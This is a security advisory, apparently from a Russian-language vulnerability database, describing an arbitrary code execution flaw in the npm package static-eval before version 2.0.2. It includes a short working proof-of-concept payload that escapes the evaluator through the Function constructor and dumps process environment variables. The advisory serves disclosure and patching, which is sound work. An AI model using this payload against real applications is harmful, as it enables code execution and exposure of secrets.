Описание
Sandbox Breakout / Arbitrary Code Execution in static-eval
Versions of static-evalprior to 2.0.2 pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
Proof of concept
var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));
Recommendation
Upgrade to version 2.0.2 or later.
Пакеты
Наименование
static-eval
npm
Затронутые версииВерсия исправления
<= 2.0.1
2.0.2
7.3 High
CVSS3
Дефекты
CWE-94
7.3 High
CVSS3
Дефекты
CWE-94